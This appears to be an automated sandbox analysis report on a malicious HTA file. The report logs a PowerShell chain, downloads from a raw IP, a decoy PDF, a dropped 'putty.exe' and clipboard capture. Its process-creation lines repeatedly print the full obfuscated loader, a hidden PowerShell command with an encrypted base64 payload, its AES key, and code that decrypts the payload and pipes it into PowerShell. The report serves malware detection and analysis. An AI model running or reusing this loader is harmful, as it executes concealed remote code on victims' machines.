Source: powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1410247548.0000000004A38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1404886400.00000000057E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1420106740.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: the.earth.li
Source: C:\Users\user\putty.exeCode function: 10_2_00448111 recv,10_2_00448111
Source: global trafficHTTP traffic detected: GET /Research.pdf HTTP/1.1Host: 45.9.190.201Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.63/x86/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to modify clipboard data
Source: C:\Users\user\putty.exeCode function: 10_2_0043F872 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,SendMessageA,10_2_0043F872
Source: C:\Users\user\putty.exeCode function: 10_2_0043F91B WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalFree,GlobalLock,GlobalLock,GlobalFree,GlobalFree,GlobalFree,GlobalLock,GlobalUnlock,WideCharToMultiByte,_strlen,_strlen,_strcat,WideCharToMultiByte,_strcat,_strcat,_strcat,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,GlobalFree,GlobalFree,10_2_0043F91B
Source: C:\Users\user\putty.exeCode function: 10_2_00440064 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,10_2_00440064
Source: C:\Users\user\putty.exeCode function: 10_2_004424A0 SetWindowTextA,SetWindowTextA,SetWindowTextA,PostQuitMessage,CreateCaret,ShowCaret,MessageBoxA,DestroyWindow,HideCaret,BeginPaint,SelectPalette,RealizePalette,SelectObject,CreateSolidBrush,SelectObject,CreatePen,SelectObject,IntersectClipRect,ExcludeClipRect,Rectangle,SelectObject,DeleteObject,DeleteObject,SelectObject,DeleteObject,GetStockObject,GetStockObject,SelectObject,GetStockObject,SelectObject,EndPaint,ShowCaret,DestroyCaret,TranslateMessage,EnableMenuItem,IsZoomed,IsZoomed,ShowWindow,DeleteObject,IsZoomed,GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowPos,SetWindowPos,SetWindowLongA,SetWindowLongA,SetWindowPos,IsZoomed,IsIconic,SetWindowTextA,InvalidateRect,SendMessageA,PostMessageA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ImmGetContext,ImmGetCompositionStringW,ImmGetCompositionStringW,ImmReleaseContext,ImmGetContext,ImmSetCompositionFontA,ImmReleaseContext,KillTimer,GetCursorPos,TrackPopupMenu,GetCapture,GetScrollInfo,InvalidateRect,InvalidateRect,GetCursorPos,SendMessageA,SetCapture,ReleaseCapture,RealizePalette,UpdateColors,RealizePalette,UpdateColors,DefWindowProcA,GetKeyboardState,ScreenToClient,10_2_004424A0
Source: C:\Users\user\putty.exeCode function: 10_2_00440064 OpenClipboard,GetClipboardData,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,10_2_00440064

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 4564, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5292, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2215
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2096
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2048
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2215Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2096Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2048Jump to behavior
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\putty.exeJump to dropped file
Source: Process Memory Space: powershell.exe PID: 4564, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5292, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\putty.exeCode function: 10_2_0045203A10_2_0045203A
Source: C:\Users\user\putty.exeCode function: 10_2_004010F610_2_004010F6
Source: C:\Users\user\putty.exeCode function: 10_2_004250FD10_2_004250FD
Source: C:\Users\user\putty.exeCode function: 10_2_0042116010_2_00421160
Source: C:\Users\user\putty.exeCode function: 10_2_0041C16810_2_0041C168
Source: C:\Users\user\putty.exeCode function: 10_2_0042E12C10_2_0042E12C
Source: C:\Users\user\putty.exeCode function: 10_2_0042125E10_2_0042125E
Source: C:\Users\user\putty.exeCode function: 10_2_0042427710_2_00424277
Source: C:\Users\user\putty.exeCode function: 10_2_0043121910_2_00431219
Source: C:\Users\user\putty.exeCode function: 10_2_0042023710_2_00420237
Source: C:\Users\user\putty.exeCode function: 10_2_0043423E10_2_0043423E
Source: C:\Users\user\putty.exeCode function: 10_2_0045128010_2_00451280
Source: C:\Users\user\putty.exeCode function: 10_2_0042034810_2_00420348
Source: C:\Users\user\putty.exeCode function: 10_2_0043535510_2_00435355
Source: C:\Users\user\putty.exeCode function: 10_2_0041540510_2_00415405
Source: C:\Users\user\putty.exeCode function: 10_2_0041F40F10_2_0041F40F
Source: C:\Users\user\putty.exeCode function: 10_2_004424A010_2_004424A0
Source: C:\Users\user\putty.exeCode function: 10_2_0044157E10_2_0044157E
Source: C:\Users\user\putty.exeCode function: 10_2_0041F67710_2_0041F677
Source: C:\Users\user\putty.exeCode function: 10_2_004206FF10_2_004206FF
Source: C:\Users\user\putty.exeCode function: 10_2_0043E75310_2_0043E753
Source: C:\Users\user\putty.exeCode function: 10_2_0041975910_2_00419759
Source: C:\Users\user\putty.exeCode function: 10_2_0042387510_2_00423875
Source: C:\Users\user\putty.exeCode function: 10_2_0042C81D10_2_0042C81D
Source: C:\Users\user\putty.exeCode function: 10_2_0041F9FB10_2_0041F9FB
Source: C:\Users\user\putty.exeCode function: 10_2_0041E99510_2_0041E995
Source: C:\Users\user\putty.exeCode function: 10_2_0042A99510_2_0042A995
Source: C:\Users\user\putty.exeCode function: 10_2_00420ACB10_2_00420ACB
Source: C:\Users\user\putty.exeCode function: 10_2_0043BA8E10_2_0043BA8E
Source: C:\Users\user\putty.exeCode function: 10_2_0042DBD010_2_0042DBD0
Source: C:\Users\user\putty.exeCode function: 10_2_0041EBF710_2_0041EBF7
Source: C:\Users\user\putty.exeCode function: 10_2_0040AB8E10_2_0040AB8E
Source: C:\Users\user\putty.exeCode function: 10_2_0044CC7010_2_0044CC70
Source: C:\Users\user\putty.exeCode function: 10_2_00424C7910_2_00424C79
Source: C:\Users\user\putty.exeCode function: 10_2_00426CBC10_2_00426CBC
Source: C:\Users\user\putty.exeCode function: 10_2_00437E1C10_2_00437E1C
Source: C:\Users\user\putty.exeCode function: 10_2_0041FE9B10_2_0041FE9B
Source: C:\Users\user\putty.exeCode function: 10_2_0041EF7510_2_0041EF75
Source: C:\Users\user\putty.exeCode function: 10_2_00420F7D10_2_00420F7D
Source: C:\Users\user\putty.exeCode function: 10_2_00454F3A10_2_00454F3A
Source: C:\Users\user\putty.exeCode function: String function: 004080C2 appears 68 times
Source: C:\Users\user\putty.exeCode function: String function: 0040B852 appears 132 times
Source: C:\Users\user\putty.exeCode function: String function: 00449720 appears 127 times
Source: C:\Users\user\putty.exeCode function: String function: 0044CD68 appears 33 times
Source: C:\Users\user\putty.exeCode function: String function: 004116F9 appears 62 times
Source: C:\Users\user\putty.exeCode function: String function: 0040E8A8 appears 108 times
Source: C:\Users\user\putty.exeCode function: String function: 00407ACB appears 73 times
Source: C:\Users\user\putty.exeCode function: String function: 00407D26 appears 32 times
Source: C:\Users\user\putty.exeCode function: String function: 0044C4D0 appears 63 times
Source: C:\Users\user\putty.exeCode function: String function: 0044C558 appears 251 times
Source: C:\Users\user\putty.exeCode function: String function: 0043D0E9 appears 111 times
Source: C:\Users\user\putty.exeCode function: String function: 00407925 appears 262 times
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Joe Sandbox ViewDropped File: C:\Users\user\putty.exe ABCC2A2D828B1624459CF8C4D2CCDFDCDE62C8D1AB51E438DB200AB3C5C8CD17
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaReversingLabs: Detection: 21%
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaVirustotal: Detection: 30%
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\putty.exe "C:\Users\user\putty.exe"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - Jump to behavior
